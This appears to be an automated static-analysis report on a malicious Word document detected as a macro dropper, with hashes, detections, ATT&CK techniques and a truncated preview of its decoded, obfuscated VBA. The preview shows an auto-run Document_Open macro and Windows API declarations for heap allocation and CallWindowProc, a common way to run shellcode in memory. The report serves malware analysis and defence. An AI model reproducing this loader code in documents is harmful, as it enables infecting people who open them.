Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8c8390904b5e75a…

MALICIOUS

Office (OLE)

172.5 KB Created: 2017-12-10 08:33:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 0f3a9bf5e81cdaee255fd1d4b6b31ebf SHA-1: 36af49687d84e204eb69d4c1942f483bfb62988c SHA-256: c8c8390904b5e75acfd73e0cbef92e327658c4a0d7a31d95b89d886ff0ff046e
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros, including a Document_Open macro, indicating an attempt to execute code upon opening. The presence of obfuscated VBA code suggests the macro is designed to download and execute a secondary payload, a common technique for malware droppers. The specific macro functions and API calls hint at memory manipulation and execution, further supporting this assessment.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6400143-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6400143-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 78241 bytes
SHA-256: 3c9a368c59bdcd32142c15582c7b12312d43085d045f265c00bac7f0d2b23416
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Vba7 Then
PRIVate DeCLaRe PTrsafE FunCTIOn QFlm2dNcITrWeNVo03ro lIB "UsEr32" aLiAs "CallWindowProcW" (byvAl fmS7VYcVzYmRTs As LOnGpTR, BYvAl XketR46D aS lONGpTr, bYVAL oaHn as LonG, BYVal b20xbu As LONgptR, bYVal fOWfDAe9XOSjhC aS loNgPtr)  aS lONgPtR
PriVATE decLaRE pTrSAfe fUnCtiON zXmCvbMILN lib "KeRNeL32" aLIas "HeapCreate" (bYvaL zBWMB AS Long, ByvAl ZC65TWQzDI aS loNgPtr, byVaL F40Dz6aLnO As LONgptR)  AS longPTR
prIvATe DeCLare pTRSaFe FUnctIoN KfH8yJTuodzOM5JgQrvE lIb "kERNEl32" alIaS "HeapAlloc" (Byval MmhTE0 as LoNgPTr, ByVal S6RFOm aS LOng, bYvaL TLE As lONgptr)  aS lOngPTR
priVATe DecLaRe pTRSAfe SUb FRI6v94whT lIB "kErNEl32" aliAS "RtlMoveMemory" (NxS aS any, byReF MR3MkjHgM9xS8 AS anY, BYVal s17 as LonG)

#Else
Private Declare Function qfLm2DNcItRWenvo03RO Lib "usEr32" Alias "CallWindowProcW" (ByVal iEXbM6Zt As Long, ByVal WxbyCvT As Long, ByVal vAqTNm As Long, ByVal sTVYApxGkdJ As Long, ByVal m33AW5VA2ZpS0Hx As Long) As Long
Private Declare Function ZXmcvBmILn Lib "KeRneL32" Alias "HeapCreate" (ByVal fket As Long, ByVal csvh40BH As Long, ByVal ybn As Long) As Long
Private Declare Function KfH8yJTuodzOM5JgQrvE Lib "KeRneL32" Alias "HeapAlloc" (ByVal HIc3vi As Long, ByVal rj2 As Long, ByVal XSGB As Long) As Long
Private Declare Sub FrI6V94wht Lib "KeRneL32" Alias "RtlMoveMemory" (tdge3tmWn9C6R As Any, ByRef I5bmO As Any, ByVal InZOc As Long)

#End If

Sub dOcUMeNt_OPen()
Call FjqQ3jagNrSSVdY8x5cKPB
End Sub
Private Function FjqQ3jagNrSSVdY8x5cKPB() As Double
Call Oa95Kkbvc4PziElL6k5hGEN
End Function
Private Function Oa95Kkbvc4PziElL6k5hGEN() As Integer
Call W9TSajxymLfoKnvGI9vwI9jI
End Function
Static Function W9TSajxymLfoKnvGI9vwI9jI() As Variant
Call X1mqLzcYtZi6
End Function
Private Function X1mqLzcYtZi6() As Boolean
Call KCTDikvjG6JFuOJhIM5
End Function
Function KCTDikvjG6JFuOJhIM5() As Object
Call wFjiWZfq4N3S4lDa6rrukz
End Function
Function wFjiWZfq4N3S4lDa6rrukz() As String
Call gdZO2PZioX9KkVvkW1
End Function
Private Function gdZO2PZioX9KkVvkW1() As Date
Call RP6U5hAiJhQOBrucr5
End Function
Static Function RP6U5hAiJhQOBrucr5() As Double
Call WW3pagLLsaTrEMjbC09
End Function
Function WW3pagLLsaTrEMjbC09() As Byte
Call fss3lWYF1s41zwa9T4cxFi0DB
End Function
Public Function fss3lWYF1s41zwa9T4cxFi0DB() As String
Call YW75YejJ6UNJwQvXUcpXY
End Function
Static Function YW75YejJ6UNJwQvXUcpXY() As Single
Call uTrs8zRkurfS
End Function
Sub uTrs8zRkurfS()
Call ixJUiVD02V5q
End Sub
Static Function ixJUiVD02V5q() As Double
Call iS35UktV62HBwgHFiiv
End Function
Function iS35UktV62HBwgHFiiv() As Object
Call EhPyublqQfHkcxhE6N1ic9
End Function
Function EhPyublqQfHkcxhE6N1ic9() As Object
Call kbjoYFxuopNu8ldYUT
End Function
Private Function kbjoYFxuopNu8ldYUT() As Double
Call OmtXWgvPw8nfYOLZqydlisN
End Function
Private Function OmtXWgvPw8nfYOLZqydlisN() As Double
Call Gs1hoIxDM8BByUNvEgVDuwH
End Function
Private Function Gs1hoIxDM8BByUNvEgVDuwH() As Double
Call m6l9O2bnmWvLWi3L2Ud3C2Z
End Function
Private Function m6l9O2bnmWvLWi3L2Ud3C2Z() As Integer
Call iPRKIjLOoZRWiZHC8HnCYdRY
End Function
Static Function iPRKIjLOoZRWiZHC8HnCYdRY() As Currency
Call XiuFXuyblI41dgMDXyqNX
End Function
Static Function XiuFXuyblI41dgMDXyqNX() As Double
Call SGTn8G3X20ZdCOZLwujHckB
End Function
Private Function SGTn8G3X20ZdCOZLwujHckB() As Date
Call hPMmvReCXX0sTp2oNp
End Function
Static Function hPMmvReCXX0sTp2oNp() As Integer
Call qtPaO3XQ6rdM65Dy6pfA
End Function
Public Function qtPaO3XQ6rdM65Dy6pfA() As Boolean
Call JNKUnTqipdyS1R
End Function
Public Function JNKUnTqipdyS1R() As Object
Call guNXsOnzQqVZAatz0sJdS
End Function
Static Function guNXsOnzQqVZAatz0sJdS() As Single
Call q1BqcXfcgV3s
End Function
Public Function q1BqcXfcgV3s() As Long
Call TQ0rJq
... (truncated)